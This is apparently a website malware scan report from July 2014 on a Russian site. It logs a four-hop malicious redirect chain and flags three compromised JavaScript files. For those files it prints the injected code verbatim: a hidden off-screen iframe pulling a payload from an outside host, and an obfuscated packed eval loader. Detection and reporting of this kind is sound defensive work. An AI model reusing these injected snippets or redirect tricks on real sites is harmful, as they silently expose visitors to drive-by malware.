Malicious/Suspicious Redirects
Redirect 1
  URL: http://oknadlyvseh.ru/ (imitation of visitor from search engine)
  Request:
    GET / HTTP/1.1
    Host: oknadlyvseh.ru
    Referer: http://www.google.com/search?q=redirect+check1
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Mon, 28 Jul 2014 20:21:16 GMT
    Location: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php
    Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
    Content-Type: text/html
    X-Powered-By: PHP/5.2.17
  Status: malicious

Redirect 2
  URL: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php (imitation of visitor from search engine)
  Request:
    GET /sctcom/cgi-bin/1.php HTTP/1.1
    Host: www.totalcarsolution.com
    Referer: http://www.google.com/search?q=redirect+check2
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Mon, 28 Jul 2014 20:21:19 GMT
    Location: http://www.csra.de/includes/domit/1.php
    Server: Apache
    Vary: Accept-Encoding
    Content-Length: 0
    Content-Type: text/html
  Status: malicious

Redirect 3
  URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine)
  Request:
    GET /includes/domit/1.php HTTP/1.1
    Host: www.csra.de
    Referer: http://www.google.com/search?q=redirect+check3
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Mon, 28 Jul 2014 20:21:20 GMT
    Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
    Server: Apache
    Content-Length: 0
    Content-Type: text/html
    X-Powered-By: PHP/5.4.30
  Status: malicious

Redirect 4
  URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine)
  Request:
    GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
    Host: jbtconsultinggroup.com
    Referer: http://www.google.com/search?q=redirect+check4
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Mon, 28 Jul 2014 20:21:21 GMT
    Location: http://google.ru
    Server: Apache
    Vary: Accept-Encoding
    Content-Length: 0
    Content-Type: text/html
  Status: malicious
Scanned pages/files
Request | Server response | Status |
http://oknadlyvseh.ru/ | 200 OK Content-Length: 25744 Content-Type: text/html | clean |
http://oknadlyvseh.ru/media/system/js/caption.js | 403 Forbidden Content-Length: 295 Content-Type: text/html | clean |
http://oknadlyvseh.ru/test404page.js | 404 Not Found Content-Length: 279 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://oknadlyvseh.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 286 Content-Type: application/javascript | malicious |
  Malicious code - confirmed by antiviruses (see below):
    if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://tkhaap.pcanywhere.net/9c020caf21567078541cfc09c46c53ba.sys?11"></iframe>');
  Antivirus reports:
http://oknadlyvseh.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 9774 Content-Type: application/javascript | malicious |
  Malicious code - confirmed by antiviruses (see below):
    ;eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)<36?c.toString(36):String.fromCharCode(c+29))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'\\w{1,2}'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(7($){6 P=7(A,B){6 C=$.extend({},$.fn.22.2s,B);7 D(a){17 a?a.replace(/ /g,\'%20\'):\'\'};6 E={V:0,14:\'\',1q:0,R:\'\',1r:Y,23:Y,1v:Y,2t:Y};6 F=$(A);F.1g(\'9:1B\',E);F.
  Antivirus reports:
http://oknadlyvseh.ru/templates/jm_tmpl4/lib/scripts/template_scripts.js | 200 OK Content-Length: 2418 Content-Type: application/javascript | malicious |
  Malicious code - confirmed by antiviruses (see below):
    window.addEvent("domready",function(){ Fx.Height = Fx.Style.extend({initialize: function(el, options){this.parent(el, 'height', options);this.element.setStyle('overflow', 'hidden');},toggle: function(){return (this.element.offsetHeight > 0) ? this.custom(this.element.offsetHeight, 0) : this.custom(0, this.element.scrollHeight);},show: function(){return this.set(this.element.scrollHeight);}}); Fx.Opacity = Fx.Style.extend({initialize: function(el, op }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk20_style',style,{duration: 200,path: "/"}); actual_style = style; };document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://tkhaap.pcanywhere.net/9c020caf21567078541cfc09c46c53ba.sys?11"></iframe>');
  Antivirus reports:
http://oknadlyvseh.ru/templates/jm_tmpl4/lib/scripts/menu.php?style=standard&width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 256 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oknadlyvseh.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oknadlyvseh.ru/
Result: oknadlyvseh.ru is not infected or malware details are not published yet.